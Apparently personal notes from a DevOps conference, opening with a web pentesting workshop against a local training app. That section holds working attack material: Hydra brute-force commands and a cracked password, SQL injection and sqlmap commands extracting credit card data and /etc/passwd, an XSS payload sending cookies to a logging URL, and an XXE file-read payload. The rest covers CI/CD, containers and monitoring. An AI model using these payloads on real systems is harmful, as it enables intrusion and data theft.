Glossar

A/B Testing - Two groups of users (A and B) interact with different versions of the app (e.g. Design is different). The version with a better conversion rate wins.

Monday

09:30 - 17:00 (Salon 4) - Web Hacking: Pentesting and attacking Web Apps

http://christian-schneider.net/downloads/Toolbased_WebPentesting.pdf FindBugs + FindSecurityBugs - Plugins in Eclipse

CVE

CVE-ID - One vulnerabilty in a CVE registry. It includes a score CVEDetails.com - Publicly known vulnerabilites e.g. Tomcat 7.0.61: https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-887/version_id-190760/Apache-Tomcat-7.0.61.html

Search by version numbers

Exploit Database

exploit-db.com Exploits with code ready to use (i.e. a python code snippit to trigger this vulnerability)

exploits.shodan.io

Nikto

Scans the WebServer Checks for vulnerble files

> nikto -h http://localhost:8080

Exceutes tousands of HTTP requests to check weather there are vulnerable stuff (not exploiting -> rather fingerprinting)

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          127.0.0.1
+ Target Hostname:    localhost
+ Target Port:        8080
+ Start Time:         2017-06-12 04:19:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /examples/servlets/index.html, fields: 0xW/7139 0x1427457886000 
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7677 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-06-12 04:19:52 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Intercepting Proxy

THE Pentestesters/Hackers IDE
Local Proxy Server -> Configure any kind of web client (i.e. browser) -> All this traffic emited by this client goes through this proxy
Proxies HTTP and HTTPS traffic
Sniffs the network
Intercepts Web traffic
Put us into command to better attack the server
We can also route this proxy with our smartphone (inspect mobile apps talking to a backend REST-API)

OWASP ZAP

Intercepting Proxy
There is a Plugin for ZAP to import a Swagger definition file: zaproxy/zaproxy#2034

Change the Port to another port (Tools > Options > Local Proxy): 4711
Set Proxy in Firefox (empty the "No Proxy for" stuff)
Request to our webserver
See the requests in ZAP
Toggle to intercepting Mode (Breakpoint mode)
Request to our webserver
Go to the Break tab
Change the payload of the request in this tab
Hit "Go to next Breakpoint" (Play button)
Hit "Show hiden fields" (lightbulp) - Shows all hidden fields in the webbrowser

Passive Scan Mode (default as it is invasive)

Tab "Alerts"
Shows possible vulnerabilites

Active Scan Mode - "Scan as you surf"-Mode

Attacking while traversing through the application
It automatically injects SQL + XSS stuff and permutates on every input vectors in each request
There is a Jenkins Plugin which executes a ZAP Active Scan in a headless mode
You can export a HTML Report of the active scan

Right Click in ZAP on the Site: Add to Context > Add to default context
Now the site has a target symbol
Click ATTACK Mode (HINT: Now you are in "Scan as you surf"-Mode)
Now it is attacking (in the Active Scan Tab)
Now click on a Link on the webpage
Now it scans this new site
When you go to the previous site it doesn't get scanned again

Active Mode Settings

Scan Policy - How deep should the scan reach (Analyze > Scan Policy Managers)
Active Scan Input Vectors - (Tools > Options)

Plugins

Advanced SQLInjection Scanner (derived by SQLMap) --> Every active scan includes this SQLMap stuff

Arachni

http://www.arachni-scanner.com/
CLI
Not part of Kali Linux by default
Point to your test system and let it run
Ruby based
can serve a UI
Provides a headless PhantomJS based browser cluster (takes a lot of resources)
- A scan takes long (so execute it only in a nighly build)
It is better at spidering JavaScript based apps than ZAPs spider
You can provide a login script
Nice HTML Report

Crack admin PW via bruteforce with the tool "Hydra"

CLI-Tool
Services inside Hydra: Bruteforcing those services
Bruteforce with a password list as a seed
- There are password lists inside of Kali Linux: /usr/share/wordlists/rockyou.txt.gz
- Or on GitHub: danielmiessler/SecLists

Login request on our site (proxied through our ZAP)
Take a look at the request in ZAP
Use the form input fields on the request header as our seed
Use top-pw-cracking-list.txt
> hydra

hydra -t 4 (number of threads running) -f (stop on the first finding) -l admin (user to bruteforce) -P top-pw-cracking-list.txt (pw list) localhost (host) -s 8080 (port) http-post-form (service) "/marathon/secured/j_security_check: j_username=^USER^%j_password=^PASS^: Wrong"

Wrong is the expected response body

> hydra -t 2 -f -l admin -P top-pw-cracking-list.txt localhost -s 8080 http-post-form "/marathon/secured/j_security_check:
j_username=^USER^%j_password=^PASS^:
Wrong"

Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-06-12 05:31:37
[DATA] max 2 tasks per 1 server, overall 64 tasks, 1001 login tries (l:1/p:1001), ~7 tries per task
[DATA] attacking service http-post-form on port 8080
[8080][http-post-form] host: localhost   login: admin   password: password
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-06-12 05:31:38

SQL-Injection

Java: Easy to fix with prepared statements

Possible Injection Strings

'
or 1=1 --
and 'a'='a
etc. quoted and unquoted

Boolean Blind test (to an unquoted SQL-Injection -> No ' is needed)

Request to http://localhost:8080/marathon/showResults.page?marathon=2
Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=1
Request to http://localhost:8080/marathon/showResults.page?marathon=2 AND 1=2

Within the Code with the String concatenated SQL query

marathonId is "tainted" as it comes from the outside
finishedFilter isn't "tainted"

Find out table and column names

By selecting meta tables/views (i.e. PG_TABLES in PostgreSQL)
By using UNION
- SELECT ... FROM ... WHERE UNION SELECT ... FROM ... WHERE ...
- Prerequites for our UNION
  - Same number of columns that the original SELECT has
  - Same datatypes that the original SELECT has
- Use null because null is datatype independent: SELECT null, null...
- The Resulting Injection String: UNION SELECT null, null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
- Use the "--" at the end to comment the rest of the query out
- Shifting a String 'X' around in the select until we find a String is ok for that column as a datatype: UNION SELECT 'X', null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--
  - When we found a matching column: Get the column datatype and the column name by inserting the following instead of the 'X':
    - ???
  - We can select the credit card numbers with the following:
    - UNION SELECT credit_card_number, null, null FROM information_schema.columns WHERE table_schema='PUBLIC'--

Blind SQL-Injection exploitation

Determine table names or other columns values by using db timings with ASCII() and Sleep() functions and CASE WHEN within the WHERE statement.
- If the first char has an ASCII number lower than 100, then sleep 3 seconds. When the requests now runs 3 seconds you know, that the first char is an ASCII char between 0 - 100. Thereby we can determin the exact char.

sqlmap

CLI
Perfoms checks (timebased as well)
Does all the things above automatcally
sqlmap --flush-session -u http://localhost:8080/marathon/showResults.page?marathon=2
- Tests if a certain request is injectable
sqlmap --dbs -u http://localhost:8080/marathon/showResults.page?marathon=2
- ???
sqlmap -D PUBLIC --tables --columns -u http://localhost:8080/marathon/showResults.page?marathon=2
- UNION trick: Grabs the results from the response and presents it nicely: Shows all tables with columns and its datatypes
sqlmap --sql-shell -u http://localhost:8080/marathon/showResults.page?marathon=2
- Gives you an SQL shell: SELECT creditcard_number FROM runner;
Select files from the filesystem (i.e. passwd)
1. Create a table "mytemp" within the sql-shell
2. Use PostgreSQLs CSV-Importing feature "copy from /etc/passwd" within the sql-shell
3. Select the "mytemp" table within the sql-shell --> Now we can read the content of the passwd file :)

Source and Sink (= Senke)

source - Source of malicous data. Everything coming from a request (input vector / what a attacker can modify) sink - You have 100% control over the arguments

Source finds a way into a sink --> Vulnerabilty

Taint Tracking - Trace the request from source to sink Taint Flow - ???

Cross-Site Scripting (XSS)

Top 3 in OWASP Top 10
With XSS we can do everything a user can do

Three Types of XSS

Reflected XSS - Directly reflected in the browser after inserting a vulnerable String (Just one user interaction)
Persistent XSS - The malicous code sits inside the db and pops up on every refresh
DOM based XSS - JavaScript based

<img src="//localhost/myimg.png" onload=src="//localhost/log.jsp?value="document.cookie</img>

HttpOnly - Can be set on cookies so that they can't be read by (malicous) JavaScript

Escape out of an attribute (i.e. title)

<button title="Inserted the value of 2">Back</button>
- <script>alert(1)</script> would result in: <button title="Inserted the value of <script>alert(1)</script>">Back</button>
- But with "><script>alert(1)</script> it result in: <button title="Inserted the value of "><script>alert(1)</script>">Back</button>

Beef

Ruby based tool
Browser Exploitation Framework
Abuse XSS vulnerabilites
Provides a UI (with Ext JS)
Victims browser sets up a WebSocket connection to the Beef server
The attacker sees the online clients in the UI
The attacker can executes stuff on the client + read values out of forms etc.

Open Bug Bounty

openbugbounty.org
Publicly known XSS vulnerabilites of websites

XML eXternal Entities

Uploading an XML file

Include an inline DTD to the XML --> The XML parser reads the /etc/passwd file and shows writes it to the XML:

<!xml ...>

<!DOCTYPE test [
    <!ENTITY cool SYSTEM "file:///etc/passwd">
]>

<myType>
    &cool;
</myType>

OWASP

Best Practices how to Pentest
Top 10 Vulnerabilites
Non-Profit organizatiion
They are providing an "Intercepting Proxy" OWASP-ZAP (already inside Kali Linux)

WHAT WE HAVE TO DO ON OUR APPLICATIONS

HTTPS everywhere
Don't mix Data with Code (i.e. String concate a SQL query with variables inside)
Don't store files uploaded by users in the filesystem --> Use the DB with Lobs instead

Tuesday

09:00 - 09:30 (SAAL MARITIM B/C) - Reception and Opening

09:30 - 10:00 (SAAL MARITIM B/C) - Crossing the River by feeling the Stones

10:15 - 11:15 (SAAL MARITIM B/C) - Challenges in Release Management for complex and highly regulated Environments

What drives DevOps?

We have to be faster than before
Cloud
Multi-Channel (i.e. Voice-Channel: Alexa)
Time-to-Market (automated release approach)

Complex dev environment

A lot of agile teams
Separate release streams
Different technology stacks with different tools
Dependencies between applications

Regulations

PCI - WHAT!?
SAE - WHATTTT
FDA - Hmm?
Automotive Spice - WTF?

Core Principles

Traceability
Responsibility
Audit-Save - Not changeable

What do we have to do?

Efficient delivery framework
Make the toolchain changeable (i.e. does your Toolchain support serverless in the future)
Higher agility (i.e. Product Managers have to work more agile)
Communicate successes/achievements inside of the company (i.e. Testers didn't know that there is an automated provisioning system for test platforms)

Requirements on our toolchain

The pipeline process has to be visible
Dependency Management
Quality Gates
Cross Pipeline reporting
...

Problem: 300 - 400 Tasks vom Stages from dev to prod

5% from 1.000.000 deployments reach production

Why? Because they missed quality Gates in the pipeline

How to do it with so many tools?

Dev > Build > Integrate > Test > Release > Deploy > Operate
What is the market leader to do all these things
- Most companies do it with an Excel list (document the Release Process with start/end dates, durations, team members for each individual application)
  - They require weekly + daily release meetings
  - The Release Manager asks you: Is this or that done yet? - No because we have to wait for another person outside of the team to do stuff
Integrate everything in the release process
Change Management DB - What has been released etc.

The Big Picture

Release Pipeline Diagram
Two different Artifactories for intern and production
...

AWS + CloudFoundry + OpenStack

Pipeline
- -> Internal Cloud (CF + OpenStack)
- -> AWS
- -> ...

Pipeline for a Pipeline

Development Pipeline --- All pipeline changes are tested first ---> Production Pipeline

Self service onboarding (What?! :D)

Diagram
Developers
- -> XL-Release (AppName, GitHub Repo, etc. provided by the developers)
  - -> Pipeline

X-File - A Groovy DSL to define your Release Pipeline by XL-Release

Defines Phases
- Has a Task (i.e. to wait for something (QA))
- Has Dependencies

XL-Release profides a Web UI

A Board for a Release (Flow - For Business People)
A calendar with planned releases and their dependencies (i.e. sb has to install a test system on a machine)
This UI tries to replace an Excel Sheet
It also tries to replace E-Mail
Compliance
- Rights Management (Who can start/abort a release etc.)
- Auditing
- Reporting - Who did what?
- Traceability - Where are we in the release process?

How to deploy

Deploy to a cluster
Make a smoke test

CD Books tell you: When there is an error -> Don't fix the symtoms -> "Press the red button" -> Fix the source of the error -> Retrigger a new deployment

12:00 - 13:00 (SALON 7) - Don’t crash the Sandmann – continuously build, test and deploy on OTC

Customer: RBB

rbb-online.de
rbb24.de
Problem: Millions of requests on the news page (Beim Terroranschlag)
- --> Buy new HW or go in the cloud
There are High Peaks on the "Sandmann - Webpage" on the Sandmann show running in TV
They shifted in the OTC

Load Testing with Monitoring

CLI Monitoring Tool: Taurus
Visible as a graph in the CLI
- 20 concurrent users
- 20 active users
nload - CLI Tool that monitors the current network traffic (In and Outgoing) on the console
Jenkins Slave on the OTC triggers the Load Test
- Produces an XML Report with a Graph of all the instances running over time

Taurus

CLI tool
Can trigger JMeter
Configure in YAML file --> ??? Does it produce a JMeter config ???
- Define concurrent clients firing requests
- Define scenarios
  - Requests to http://...
- Define Reporting
  - Define Criteria when to fail the test (i.e. max response time)
Tests an Auto Scaling Group in the OTC

JMeter

Don't use GUI mode for load testing
There is a headless mode to run the load test
Configuration + Scripting is bad in the GUI, better do it with Taurus' YAML file

OTC - Based on OpenStack

Auto Scaling
- Multiple Groups
  - With multiple Instances
Hosted in Magdeburg and Biere

RBB

Images are built on the OTC with Ansible via Jenkins and are published in a private registry
Automated Load- and Performance Testing
Webcaching Layer on OTC
- HAProxy

OpenStack

Growing echo system

Pets vs. Cattle - ???

Jump Host - ???

VPC - ???

ECS - Elastic Cloud Server

Name
Type
Number of vCPUs
Memory
Image Type
Image
Network
- Which VPC
- IPs

Public Images (Latest OS Base Image) -> git Repo (managed by DevOps Team) -> Development VCS (Temp. Server v1) -> Private Images (Custom Server Image v1) -> Production VCS (Ephemeral Server v1)

Automated Testing

Change to the Code (Git checkin)
Pipeline is triggered
Image is created
Functional Image is created
Image is deployed on the OTC

Overview

Jenkins Master in Customer Site
Git Repo in Customer Site
Jenkins Slave in VPC
A VPC for Testing
A VPC for Production

Rolling Update (Updates without any Downtime)

Change the config in one Auto Scaling Group
A new instance with the new config is starting up
Now two instances are running in the same Auto Scaling Group
The new instance shows the new content
Trigger the down-scaling in the UI
Now only the new version is live

14:15 - 14:45 (SAAL MARITIM B/C) - Enabling Agility at Scale for the heavily regulated

ING (Bank)

The last agile mile

2012

Commerce
Application dev
Applicatino ops
Infra dev
Infra ops

2013

Commerce
Agile / Scrum
Application ops
Infra dev
Infra ops

2014

Commerce
DevOps (CD) 118 Teams
Infra dev
Infra ops

2015

BizDevOps (Tribes & Squads) 400 Teams
Infra dev
Infra ops

2016

BizDevOps (Manual IT Risk + Private Cloud)
Infra ops

IT-Risk

Policy
Principle
Control Framework
Pipeline

Principles

Speed - No longer fill out forms
Outcomes over Impositions
- Outcome - Not a filled in form, but meetings
Shift-Left - Nobody patches apps in production without going through QA
Human vs. Robots
Immutable Servers
Cattle and Pets
- Pet - Server in Prod -> Go to the doctor when its sick
- Cattle - Get another one when it is sick
Infrastructure = Code
- Robots = software
- Humans leverage automate pipelines

Learning organization

Weird assumptions about the roles of a software engineer
- Designer
- Coder
- Tester
- Deployer
- Requirements Specifier
- Solution Architect
- ...
ING changed HR

Complex Apps are best managed with Feedback loops

Feedback Loops

Need to be designed

BizDevSecRiskOps

Shift Left

Twitter: @henkkolk

15:00 - 16:00 (SAAL MARITIM B/C) - Continuous Delivery with Jenkins in the real World

They moved from Jenkins 1 to Jenkins 2 with CD

Contious Delivery vs Contiious Deployment

Continous Delivery - Before Production (you can do this by merging in master branch, build your artifact, but can not go in production)
Continous Deployment - Go in Production

Diagram

Handler (Entry Point: It is time to do st.) (i.e a git merge)
VM or Container that is clean and is similar to your production system: A place to run your tests
Tests failed - do something (i.e. open an issue)
Tests ok - do something

Continous Delivery

Increase the number of releases
Build > deploy code in a safe env > run test > deploy

Continous Integration

Integrate new code in the old code: is the new code compliant to the old code
Run security tests in this phase
GitHub let Jenkins check wheather the new code is compliant (merge button is disabled when it is not)

Why use Continous Delivery?

Stay focused on Business
Reduce human errors - circle that repeats over time (we as human are not good at those tasks -> boring)
Configure Jenkins to send notififactions to your communication channel of choice (i.e. Slack, Telegram or E-Mail)
Keep developers focused

Terminology

Release
Artifact/Artefact
Pipeline - Tunnel that our code follows from the VCS to the environment (Define it via a Jenkinsfile)
Continous delivery
Continous Integration
Continous deployment
Rollback - Deploy can fail / can break the system. Hard topic. When st breaks: start from the beginning of an old version of git (Complex systems: Snapshots)
CI server - Jenkins
Job - Single Pipeline that starts when code is merged

Unique Pipeline

Has to be unique

Speedy

Make your pipeline fast (i.e. split your pipeline / parallelize your pipeline)
- Smoke tests when merge to master parallel to static analyzation the code

Reproducible

You can reproduce the env on your local environment

Versionable

Change is lost in Jenkins when someone comes along and changes the settings of a Jenkins job --> Bad.
Jenkins Pipeline Plugin - Pipeline "Hascode"???: Put a file in your VCS that updates the settings via a git merge. It grows with your application (It is comfortable to rollback)

Track! Track! Track!

Monitor the productivity and mark your important steps
Mark a deploy to understand the changes
- Red vertical lines in a graph which (Grafana) marks a new deploy to see how a new version behaves (compare it in an easy way)
Organize a party :D

Communication Layer

Goal: Keep Guys out of Jenkins

Create Strong integration

Work hard to maintain your pipeline efficient

Staging Environment - Improvements

4 Environments
A new PR is opened
- Job: PR Checker (3 minutes)
- Periodic Job that runs the unit tests with code coverage (split it with PR Checker to have the pipeline fast) (18 minutes)
Merged to devlop
- Job: Artifact Creator Job - Creats the artifact
  - triggers: Job: Staging - Copies artifact + start secondary tomcat
Testing begins
Post Staging Acceptance
- Job: Deploy Pre Production (1 minute)
Testing Complete
- Job: Release to Production (25 sec)
Sanity Checks Complete
- Job: Merge (2 minutes)
- Job: Release

His Workflow

Merge feature branch to develop
run unit test + run static analysis + docker build + deploy to acceptance
merge develop to master (if 2. is working)
run unit test + run static analysis + docker build + deploy to production

His Opimizations to his workflow

Merge to master and use the same docker image in dev and prod
Snapshot rollback

Jenkis Server is the unique door to release to production

monitor - Monitor your servers
logs - tail logs
recovery - jenkins can fail --> Have a recovery system
HA -
scalability - Jenkins support multi node environment with Jenkins workers (scale your jenkins by adding new nodes)
❤️ your CD process

Backup / Restore policy

What happens during disaster?
Are we able to recover?
He backups JENKINS_HOME excluded plugins
There are plugins for that but he uses scripts to do it

Pipeline as code

Groovy DSL
Script it rather than configure it in the jenkins UI

node {
    stage("Checkout") {
        git branch: "master",
        credentialsId: "github-asdf",
        ....
    }
}

Trigger a build with Hubot

Built by GitHub
Chat with the robot. It takes the message and deploys it
JavaScript + NodeJS
Slack has a public protocol

Blueocean

New UI for Jenkins
It is a plugin for Jenkins
New fancy way to manage pipelines

(Jenkins) Plugins as code

It is not easy to do
Specify a list of plugins that you need
Bash Script: install-plugins.sh (look it up on GitHub)
- Reads the file with all the plugins that you specified and installs them in Jenkins
- Problem: Plugin Versions

@gianarb http://gianarb.it

16:45 - 17:45 (SAAL MARITIM B/C) - Continuous Delivery with Containers: The Good, the Bad, and the Ugly

OReilly Book: "Containerizing Continous Delivery in Java"

Containers + CD

Push st. (Container Image) down the pipeline that has to be the same (no veriations)
Adding meta data to container images is vital

Continous Delivery

Book "Continous Delivery"
Not "necissarily" Continous Deployment
A Build Pipeline is mandatory
DEV > QA > STAGING > PROD

Containers + CD

Container image == 'single binary' - the single thing that gets down the pipeline (like a .war)
Impacts QA (no longer pulling down a .war or .jar) and Production

Pipeline for Containers

Local should be like produciton as possible
Locally use same Image like in production (Alpine vs. CentOS etc. --> Decide!)

Telepresence

Tool when working with Kubernetes
Work locally and running on a cluster

Hoverfly

Tool to mock out APIs
Doing this by recording or simulating traffic
Synthetic APIs to work locally

Dockerfile (super important) - ??? One Dockerfile for local development and production ???

OS choice
Configuration
Build artifacts
Exposig ports
Language specific stuff
- JDK vs JRE + Oracle vs OpenJDK

Different Test and Prod Containers?

DB in the Test Container
Better use "test sidecar container" with all the other tools that use need (Selenium etc.) - Look up the Blogpost on this slide!
Docker multi-stage builds - Interessing Idea

Building images with Jenkins

CloudBee has nice OpenSource Plugins for Jenkins to build Images

Storing in an image registry

DockerHub

Metadata - Adding data as it goes down the pipeline

Who built it etc.
Version your Images
"Latest" Tag in Docker
- HINT! It means the last build tag that run without a specific tag/version specified!
- DONT USE LATEST: Everytime version it with a version
Application Metadata
- Version (semver)
- GIT SHA
Build metadata
- build data + image name + vendor
...
- QA control
- Security audited
Adding Lables at build time
- Docker Lables
Labelling (look it up on GitHub)
- Create file '/hooks/labels'
You can add data on build time
label-schema.org
microbadger.com
Adding Labels at runtime can be done...
- docker run -d --label (that will commit the label in the docker image --> but it does create a new image)
- Best solution: A registry with metadata support: JFrog Artifactory or NexusOSS (Modify the metadata in the registry rather than in the image itself)

Component Testing

Testing: Jenkins Pipelines (as code with a Jenkinsfile --> Creates the Job out of this file)

Baked into jenkins
node { stage("asdf) ... }
Stages are shown in Jenkins

Testing individual containers

node {
    stage("asdf") {
        docker.image()....
        waitFor... // wait 30 until /health endpoint returns "UP"
    }
}

Docker Compose + Jenkins Pipeline

node {
    stage('end-to-end tests') {
        ...
        sh docker-compose ...
    }
}

Testing NFRs has to be in the build pipeline!!!

Performance + Load testing
- Gatling (Scala based DSL: Better than JMeter) / JMeter
- Flood.io - commercial product takes your Gatlin Script and spins up Amazon Machines
Security testing
- Findsecbugs / OWASP Dependency Check
- Bdd-security (Wrapper around OWASP ZAP) / Arachni (More JavaScript Pen-Testing tool -> Covers the basics)
- GauntIt / Serverspec
- Docker Bench for Security / CoreOS Clair

Delaying NFRs to the "Last Responsible Moment"

"We are agile" so we can implement security checks and stuff later... --> WRONG!

Mechanical sympathy: Docker and Java

JVM takes half of the RAM of the machine (doesn't work in a Docker container)
Memory Problems
- Container 2GB Memory == Heap 2GB Memory...No, Don't give all the RAM to one container!!!
Entropy Problems (when no periphical device is plugged in --> It cannot generate random security stuff in Java)
TEST those Things in your Pipeline!!!

Observability is core to continous delivery

READ! InfoQ: The Challenge of Monitoring Containers at Scale

Containers are not a silver bullet

Container Platform

OpenShift is nice for that
Book: Infrastructure as Code

Summary

Continous Delivery is vital
Container Images must be the single source of truth within pipeline
- Metadata added in the pipeline
Mechanical symphaty is important
...

Books

Continous Delivery
Building Microservices
Microservices
More Agile Testing
... look them up on the slides

DevOps Weekly Newsletter

@danielbryantuk

18:15 - 19:15 (SAAL MARITIM A) - Deliver Docker Containers continuously with ECS

ECS Cluster

Includes Container Instances with an ECS-Agent (Docker container as well)
ECS-Agents communicate with AWS to start new instances if needed

ECS Cluster - Deployment Options

AWS Console
- Easy to start
- UI on the Website
AWS CLI
- Not easy to start
- Automation is possible
- A script can get complicated an very verbose (not what we want)
ECS CLI
- It is easy to start
- Automation is possile
- Via one command a cluster is up
- But use not in production
Cloud Formation
- YAML File -> Send this to the CF Service -> Does the things that need to be done
- Changes to this File result in the required changes
```
Parameters:
  KeyName:
    ...
Resources:
  ECSCluster:
    ...
  ECSAutoScalingGroup:
    ...
  ...
...
```

ECR - The Docker registry in the AWS

The first deployment

Describe the container on first deployment
- Image
- Port mapping
- Mount points
- Network options
- Docker options
Task Definition - Contains Containers
- IAM Task Role ???
- Volumes
- Network Mode
- Task Placement Constraints
Service Description - Contains a Task
- Loadbalancer
- AutoScaling - Based on metrics: Please scale up etc.
- Deployment Configuration
- Task Placement Strategy

ECS CLI can consume a Docker Compose File that generates a Task Definition based on that

Load Balancing

Static Port Mapping in the old Loadbalancer (ELB) (Not the best solution for containers)
New Loadbalancer (Application Load Balancer (ALB)) - Only HTTP - Define Rules etc.
- Provides Dynamic Port Mapping

Scaling (Up & Down)

CI1
- T1
- T2
- T3

When an alarm happens (In the Task Definition): Scale up

CI1
- T1
- T2
- T3
CI2
- T4

AutoScaling: Rule of Thumb

Threshold = (1 - max(Container Reservation) / Total Capacity of a single Container Instance) * 100)

One Metric to scale them all

Node Draining

Is needed when a new version of the application is available

Best Practices for Continous Delivery

ASG UpdatePolicy: Wait for resource signals
cfn-init: Ensure Docker and ECS-Agent is running
UserData: Use build number to enforce new EC2 instances

Volumes

Not supported or built in :(
2 Options: EBS and EFS
- EBS - No automatically scaling
- EFS - Elastic File System - It scales automatically - Pay what you need

Security

IAM Security Roles
iam.cloudonaut.io

ECS-Agent creates Tasks and talks to them via iptables

Tasks shouldn't connect to the Metadata service

What is missing here?

Monitoring
...

His wishlist for AWS

Support all docker features (i.e. HEALTHCHECK)
SecurityGroups for Containers
Support Volumns natively
...

boards.greenhouse.io/scout24

@pgarbe

20:00 - 20:45 (SAAL MARITIM B/C) - Dependency Hell, Monorepos and beyond

Netflix provides a client.jar for other services

So they can reference it in their build.gradle file as a dependency
This client.jar has dependencies as well and pulls them in the current service

Netflix uses Artifactory from JFrog

Solutions to the version problem

deal with it
share nothing or little
Monorepo
- all code in a single repo
- no versions

Netflix' approach to this problem

Astrid - Checks from artifactory which project uses which dependency in which version
Niagra - pulls in the new version of a jar to all the dependent projects an checks wheather there is a break in those projects
- When a project is ok with the new version, niagra updates the version of this dependency in this projects VCS and triggers a build pipeline to check wheather it works --> Then a PR is getting issued on those projects

@sonofgarr

Wednesday

10:15 - 11:15 - Monitoring and Log Management for Docker, Swarm and Kubernetes

Centralized Log Management - Receiving the Log in raw format and save it first

Where do you store your logs from your application (Log4j etc.) --> Configure them to write to files / stdout --> Docker is a change as it writes to stdout and stderr
Logformat: Human readable, but we want to have structured data
- How to get structured date with human readable format?
- Logshippers do collect files
- Log Parsers use regexps to parse the logs
- When structured we can put it to ElasticSearch
- Bulk Indexing with ElasticSearch
After Indexing the logs are searchable

Server/Container/App -> Log Shippers -> Centralized Log Management / Logsene

Monitoring

similar: even more tools are involved
Collect the metrics periodically and ship them to a backend -> Time Series DB

Server + App /Container Configuration -> Monitoring Agents -> Time Series DB -> Dashboard Tools, Alerting Tools, ChatOps Tools

Time Series DB

find the minimum value over time

On Top on Time Series DB there are visualization tools

i.e. Graphana / Kibana
Slack Channels for Alerting

Decision in the first place

bound to the Time Series DB

Nice Diagram of "Logging Features" with a lot of tools! Look it up in the slides!!!

Kubernetes

Pod - One or multiple Containers
1 Pod with 2 Containers (i.e. Kibana + ElasticSearch) --> Both on the same Host (communication via localhost ports) --> ReplicationController: Does the Job of
Services: Entry Point via the network to the server (similar to exposing port in docker) -> goes over the load balancer
AutoScaling
CLI Tools for it (easy to setup an ElasticSearch Cluster)

Kubernetes Dashboard / Heapster

Real time information
Heapster: real time API --> Provides Performance Metrics for every pod and container

docker stack deploy (distributed containers) --> swarm creates an overlay network (can run on different hosts --> this is not possible in Kubernetes)

Kubernetes != Swarm

Kubernetes has much things to learn
- Kubernetes better for larger companies with more teams

Docker Logging

Docker Logging Drivers
Drivers are set up by Kubernetes
From Docker: other Options as a Logging Driver:
- JournalD, etc...
- Default: JSON --> works
- If using syslog as driver: doesn't save the logs locally (it has no buffer -> Risky: prefer Filedriver and forwarding them!!!!)
docker logs container_id
docker logs container_name
Syslog Driver:
- docker run --log-driver=syslog ...
Add Context in the docker run command with --log-opt (ImageName, etc.)
More fun with TCP logging drivers:
- docker logs syslog
Splunk Logging Driver
Alternatives to improve the situation of problematic logging drivers:
- Logs as JSON
- When ElasticSearch or syslog server is not available: Have an (smart) Agent that buffers the logs (Disk Buffer)
- Log Agent - something like logstash

Tagging of logs metrics and events

Automatic tagging with:
- Docker
  - container name
  - image name
  - labges / environments
  - host name + ip (on which node is the container running)
- kubernetes
  - pod name, UID, namespace
- Swarm
  - swarm service name, id, compose project, container # scale

Container Metrics Collection

docker stats ${docker ps -q}
Monitoring Agents use this metrics and ship them to the backend

LogRouting: For Teams: Label their containers with an Index

Integrate application monitoring in the stack

Service Discorery
- etcd
- Consul
- or API's

Docker --run -> App Container (config to expose metrics) <-- App Monitor <--Automatic Run-- Docker Monitor <--discovery-- Docker

Key Container Metrics

Node Storage - Good Docker OPS clean up their disks by removing the unused containers --> Alarm for Disk problems is important
Number of containers per host - verify deployment strategies
CPU quota per container - when we run more container on one node (limit them)
Container memory and OOM counter - tune your app memory stuff like you do it for your container (JVM arguments have to match)
Docker Events - Network connects, docker pulls, (auditing: what happend during the deployment process of the container -> which container was deployed in which version in which time?)
Swarm Task Task - (Only for swarm) Pending Tasks

Limit container resources for your apps

Set cpu quotas with: cpu-quota=6000
limit Memory an configure app in container to the same limits!
disable swap: ???some option???
...

Automatic Deployment of monitoring Agents

One command to run a service on each node joining the cluster

Swarm3k - Experiment with Docker Swarm (The community provides nodes to the swarm)

Logs have to be rotated so that the disk doesnt get full

In Java exposing the JMX interface

Summary

Setup of monitoring and logging is complex in dynamic environments!!!!
Smart Agents to collect, parse, etc. logs!!!

12:00 - 13:00 - DevOps – Dev first, Ops last?

Current State of DevOps

DevOps Pipeline today

VCS > CI > CD (Delivery + Deployment) > Production

Book for Unit Testing: "Growing Object-Oriented Software, Guided by Tests"

Pipeline State UFO - A Lamp that indicates the current pipeline state :D

Production

Regression Tests

Book: "Building Microservices"

Platform-as-a-Service

Kubernetes, ...

Open-Source

Logging
- ELK
Call-Tracing
- AWS X-Ray, Zipkin
Monitoring
- Infrastructure: Nagios
- For single technologies: java, ...
Charting and dashboarding
- Grafana
- Kibana

@MartinGoodwell

14:15 - 14:45 - Failure as “Success”: the Mindset, the Methods, and the Landmines

@jpaulreed

15:00 - 16:00 - The State of Serverless

Serverless - Like | in Unix

(re)volution of the cloud
Don't operate on Server level --> We operate on functional level
Abstraction of the runtime
Costs scale with usage --> never pay for idle
No Server/container/process management
auto-scale/auto-provision
global availability

Abstractions

Bare Metal
IaaS
PaaS
Functions

Function-as-a-Service

is event-driven

Backend-as-a-Service

Use cases

Data Processing
Back-end services / web apps / IoT
Infrastructure Automation

Challenges

Functions are like microservices but smaller
Monitoring + Logging
Debugging + Diagnostics
Local Development
vendor lock-in
